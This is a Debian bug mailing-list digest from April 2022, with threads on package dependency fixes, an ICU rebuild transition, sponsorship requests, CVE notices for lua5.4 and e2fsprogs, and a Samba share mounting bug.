Its been a long time from this reply. Can it now be considered to be
supported in Debian?. Even if its tech-preview/demo it will be useful
for users who want to experiment with new stuff.

By not shipping we are blocking people from experimenting things given
that systemd is core component of OS.

Cheers,
Vasudev

Bug#1010130: libfreecad-python3-0.19: Dependency on libboost-regex1.74.0-icu67 no longer available in sid

2022-04-27 Thread Dan Chokola 
Agreed. I was just able to install FreeCAD on Debian Sid.


On Wed, Apr 27, 2022 at 8:17 AM Antoine Le Gonidec
 wrote:
>
> On Sun, 24 Apr 2022 19:36:43 -0400 Daniel Peter Chokola 
>  wrote:
> > libfreecad-python3-0.19 depends on the virtual package, 
> > libboost-regex1.74.0-icu67, which is no longer available as 
> > libboost-regex1.74 is built against libicu71. This makes FreeCAD 
> > uninstallable.
>
> libfreecad-python3-0.19 0.19.4+dfsg1-1+b2, the current version provided with 
> Debian Sid, is depending on libboost-regex1.74.0-icu71. Thanks to this update 
> freecad should once again be installable on an up-to-date Debian Sid.



-- 
Dan Chokola

Bug#1007905: transition: icu

2022-04-27 Thread Adrian Bunk 
On Fri, Apr 22, 2022 at 07:30:56PM +0200, Sebastian Ramacher wrote:
> Control: tags -1 = confirmed
> Control: forwarded -1 
> https://release.debian.org/transitions/html/auto-icu.html
> 
> Hi
> 
> On 2022-04-13 17:24:20 +0200, László Böszörményi wrote:
> > On Wed, Apr 13, 2022 at 2:36 PM Jeremy Bicha  
> > wrote:
> > > mozjs78 and mozjs91 now no longer have an ICU dependency in Unstable.
> > >
> > > 0ad was fixed also.
> >  Thanks. Did the rebuild locally on i386 and amd64; started with the
> > ICU 71.1 RC release and finished with the final release if that
> > matters. Only used Sid versions, didn't try the ones in experimental.
> > The following is the result.
> > icu-le-hb is outdated, need to be removed; pyicu needs an update that
> > I've locally. gnucash self-testing fails with its C and Golang tests.
> > The former can be fixed by adding tzdata build dependency and not yet
> > checked the latter.
> > LibreOffice self-testing, especially its break iterator test fails for
> > the Lao language. Otherwise everything was fine. But I think I might
> > redo the rebuilds (only on amd64 now) to test everything with the
> > final release of ICU. If that's not mandatory, I think ICU is quite OK
> > for a transition soon.
> 
> Please go ahead

For the ICU transition also in experimental, please do:

# Level 1

wb nmu dino-im_0.3.0-3+handy . ANY . experimental . -m "Rebuild against 
libicu71"
wb nmu matrix-construct_0.6.103~dfsg1+~6.11.4-2 . amd64 . experimental . -m 
"Rebuild against libicu71"
wb nmu performous_1.1+git20190701.9928c27-4 . ANY . experimental . -m "Rebuild 
against libicu71"
wb nmu qtbase-opensource-src_5.15.3+dfsg-2 . ANY . experimental . -m "Rebuild 
against libicu71"
wb nmu slic3r-prusa_2.4.2~rc2+dfsg-1 . amd64 arm64 armhf i386 mips64el mipsel 
ppc64el s390x . experimental . -m "Rebuild against libicu71"
wb nmu tracker_3.3.0-1 . ANY . experimental . -m "Rebuild against libicu71"

# Level 2

wb nmu gazebo_11.10.2+dfsg-1 . amd64 . experimental . -m "Rebuild against 
libicu71"
# no packages from experimental installed during the build

wb nmu qtlocation-opensource-src_5.15.3+dfsg-3 . ANY . experimental . -m 
"Rebuild against libicu71"
wb dw qtlocation-opensource-src . ANY . experimental . -m "libqt5opengl5-dev 
(>= 5.15.3+dfsg-2+b1)"

wb nmu tracker-miners_3.3.0-1 . ANY . experimental . -m "Rebuild against 
libicu71"
wb dw tracker-miners . ANY . experimental . -m "libtracker-sparql-3.0-dev (>= 
3.3.0-1+b1)"

# Level 3

wb nmu 1 qtwebengine-opensource-src_5.15.9+dfsg-1 . amd64 arm64 armhf i386 
mips64el mipsel . experimental . -m "Rebuild against libicu71"
wb dw qtwebengine-opensource-src . amd64 arm64 armhf i386 . experimental . -m 
"qtbase5-dev (>= 5.15.3+dfsg-2+b1)"
# nodejs 14 sometimes hangs on mips{,64}el
wb gb qtwebengine-opensource-src . mipsel mips64el . experimental . 
--extra-depends "nodejs (>= 16.14), qtbase5-dev (>= 5.15.3+dfsg-2+b1)"


> Cheers

cu
Adrian

Bug#1010004: RFS: odr-dabmod/2.6.0-1 [ITP] -- DAB modulator compliant to ETSI EN 300 401

2022-04-27 Thread Robin ALEXANDER 
Hi Bastian,

thank you very much. I followed your instructions and uploaded again
both odr-dabmod (Bug#1010004) and odr-dabmux (Bug#1009867). I also
removed the tag "moreinfo" on both bugs (hoping I did it right).

I now have 1 question. When I built these packages, debuild generated
the xxx_amd64.changes files. Why do I have "amd64" in the filename (I
understand it relates to the X86_64 architecture)?
For your information, the source is mainly C++ based and it compiles
properly under arm64 and arm/v7 as well. Should I have ran debuild in a
different manner or is it going to be taken care of by the debian
packaging process later on?

Kind regards.

-- 
Robin ALEXANDER

Le mercredi 27 avril 2022 à 00:58 +0200, Bastian Germann a écrit :
> Control: tags -1 moreinfo
> 
> On Fri, 22 Apr 2022 10:20:06 +0200 Robin ALEXANDER
>  wrote:
> > Changes for the initial release:
> > 
> >  odr-dabmod (2.6.0-1) unstable; urgency=low
> >  .
> >    * Initial release. Closes: #1007104
> 
> Please fix the lintian error (JS minified, source missing) by having
> the unminified source in debian/missing-sources.
> When you have uploaded a new revision (not changing the changelog),
> untag moreinfo.


signature.asc
Description: This is a digitally signed message part

Bug#1006942: safeeyes: Safeeyes no longer seems to appears in the KDE/Plasma system tray

2022-04-27 Thread Julian Gilbey 
On Wed, Mar 09, 2022 at 08:59:20AM +0100, Jonas Andradas wrote:
> On Tue, Mar 8, 2022 at 5:57 PM Jonas Andradas  wrote:
> 
>   Package: safeeyes
>   Version: 2.1.3-1
>   Severity: minor
>   X-Debbugs-Cc: j.andra...@gmail.com
> 
>   Dear Maintainer,
> 
>   I noticed that fairly recently (unfortunately, cannot exactly be sure when 
> or
>   after which package update), safeeyes does not seem appear anymore in
>   KDE/Plasma system tray. It is not shown on the system tray, neither in the
>   "visible" elements nor in the "box" that has the hidden icons.
> [...]
> 
> It seems that this bug was also opened upstream on safeeyes' github: 
> https://github.com/slgobinath/SafeEyes/issues/428 (which seems related to
> https://github.com/slgobinath/SafeEyes/issues/268)
> Best Regards,
> Jonas.

Indeed; it is fixed in commit
https://github.com/slgobinath/SafeEyes/commit/c784000e694f9fa508a2535f5d23d04456b4ff86
but upstream have not yet released a new version of the package.

Please could you upload a patched version to Debian?

Best wishes,

   Julian

Bug#1010266: RFS: base16384/2.2.0-3 [ITP] -- Encode binary files to printable utf16be

2022-04-27 Thread fumiama 
Package: sponsorship-requests
Severity: wishlist

Dear mentors,

I am looking for a sponsor for my package "base16384":

 * Package name: base16384
   Version : 2.2.0-3
   Upstream Author : fumiama 
 * URL : https://github.com/fumiama/base16384
 * License : GPL-3.0+
 * Vcs : https://salsa.debian.org/debian/base16384
   Section : utils

The source builds the following binary packages:

  base16384 - Encode binary files to printable utf16be

To access further information about this package, please visit the following 
URL:

  - https://github.com/fumiama/base16384
  - https://mentors.debian.net/package/base16384/

Alternatively, you can download the package with 'dget' using this command:

  dget -x 
https://mentors.debian.net/debian/pool/main/b/base16384/base16384_2.2.0-3.dsc

I have also published the package to launchpad. If you are using Ubuntu,
you can also install this package by the commands below:

  sudo add-apt-repository ppa:fumiama/ppa
  sudo apt-get update
  sudo apt-get install base16384

Thanks to Bastian Germann's introduction on my previous RFS,
I have changed several files to fix the issues and reduced the lintian warnings.
I hope these changes would make it possible for this package being accepted
by the Debian family.

Changes for the initial release:

 base16384 (2.2.0-3) unstable; urgency=medium
 .
   * Fix some issues in packaging. Closes: #1010055 (ITP).

Regards,
--
  fumiama

Bug#1008707: RFS: calamares-extensions/1.2.1-1 [ITP] -- Mobile module for Calamares installer framework

2022-04-27 Thread undef 





Please keep the git repo updated as well.



I held out pushing until I was happy with the upload, then promptly 
started something else. Pushed now.

Bug#1010265: CVE-2022-28805

2022-04-27 Thread Moritz Muehlenhoff 
Package: lua5.4
Version: 5.4.4-1
Severity: important
Tags: security
X-Debbugs-Cc: Debian Security Team 

This was assigned CVE-2022-28805:
https://github.com/lua/lua/commit/1f3c6f4534c6411313361697d98d1145a1f030fa
http://lua-users.org/lists/lua-l/2022-02/msg1.html
http://lua-users.org/lists/lua-l/2022-02/msg00070.html

Can you please check whether this also affects the older Lua versions
in the archive?

Cheers,
Moritz

Bug#1010264: CVE-2022-28391

2022-04-27 Thread Moritz Muehlenhoff 
Package: e2fsprogs
Version: 1.46.5-2
Severity: important

This issue was found by Alpine:
https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661

Details and the patches they used are in the report above, but the
patches are not yet merged upstream, might be worth to wait until
that's fixed since the impact is rather low.

Cheers,
Moritz

Bug#969482: ITP: glab -- An open-source GitLab command line tool

2022-04-27 Thread David Heidelberg 
There is interest in this package. Personally I would prefer to not to 
install `glab` trough Snap.


David

Bug#1010263: CVE-2022-1304

2022-04-27 Thread Moritz Muehlenhoff 
Package: e2fsprogs
Version: 1.46.5-2
Severity: important
Tags: security
X-Debbugs-Cc: Debian Security Team 

This was assigned CVE-2022-1304, originally reported to Red Hat:
https://bugzilla.redhat.com/show_bug.cgi?id=2069726
https://bugzilla.redhat.com/show_bug.cgi?id=2068113

Patch (not yet merged:
https://lore.kernel.org/linux-ext4/20220421173148.20193-1-lczer...@redhat.com/T/#u

Cheers,
Moritz

Bug#1009666: collectd-core: Please package NUT plugin

2022-04-27 Thread IOhannes m zmoelnig 


On Wed, 13 Apr 2022 16:55:46 -0700 Ian Eure  wrote:

Package: collectd-core
Version: 5.12.0-7
Severity: wishlist

Dear Maintainer,

I want to use collectd to monitor my UPS, but I’m not able to, 
since collectd isn’t build with the --enable-nut flag.


Would it be possible to include support for this, either in the 
collectd-core package or a separate collectd-plugin-nut one?





actually the collectd package has re-introduced the 'nut' module with 
5.12.0-8 (uploaded to unstable on 2022-01-20; currently in testing).


so: would it be possible to upload collectd to backports?

side effects would be:
- hddtemp has been removed
- onewire has been removed
- (a couple of other modules have been removed for exotic archs like 
kfreebsd/sha4/ia64/hurd/alpha/i386)
(personally i don't care for any of these, but would love to the have 
'nut' module on my servers running "bullseye")


dfas
IOhannes


OpenPGP_signature
Description: OpenPGP digital signature

Bug#1009907: Smbclient error: "Failed to mount Window share: invalid argument"

2022-04-27 Thread Salis, Antonello (NFOD) 
The new update 2:4.16.0+dfsg-7 is affected as well.

On 4/25/22 12:35, Simon McVittie wrote:
> Control: tags -1 - patch
> Control: forwarded -1 https://gitlab.gnome.org/GNOME/gvfs/-/issues/619
>
> On Wed, 20 Apr 2022 at 20:44:38 +0300, Michael Tokarev wrote:
>> 20.04.2022 16:06, Salis, Antonello (NFOD) wrote:
>>>  When I try to browse Windows folders with Nautilus or Nemo i get 
>>> "Failed to mount Window share: invalid argument".
>>> This never happened before last week.
>>> Found a similar topic here:https://bbs.archlinux.org/viewtopic.php?id=275179
>> This appears to be this issue: 
>> https://gitlab.gnome.org/GNOME/gvfs/-/issues/611
>> and this fix: https://gitlab.gnome.org/GNOME/gvfs/-/merge_requests/138
> I don't think that's necessarily it, unless all the people seeing this
> have a misconfigured Kerberos setup (which seems unlikely).
>
> I tried upgrading gvfs to version 1.50.1 (which includes !138) and I cannot
> connect successfully to a Samba share that allows anonymous access, logging
> in as ANONYMOUS.
>
> Workaround: I *can* connect successfully to a share that allows guest
> access with an arbitrary username and a non-empty password (I used
> "aaa", which is not my password on the server). This seems consistent
> with upstream bug 619, which does not yet have a known solution.
>
>  smcv

Bug#1009907: Smbclient error: "Failed to mount Window share: invalid argument"

2022-04-27 Thread Michael Tokarev 

27.04.2022 14:38, Salis, Antonello (NFOD) wrote:

The new update 2:4.16.0+dfsg-7 is affected as well.


Sure, there was nothing done in there about this issue.
Or else I'd mark it as fixed or at least asked you guys
to try it out :)

Thanks!

/mjt

Bug#1010262: RFS: wifi-qr/0.2-2 -- WiFi Share and Connect with QR

2022-04-27 Thread Bastian Germann 

Control: tags -1 moreinfo

You have to target unstable or experimental.

For the new patch: Please fill the DEP-3 template or remove lines that you do 
not want to use.

What about bug #989034? Please fix this.

When you are done, please untag moreinfo.

  1   2   >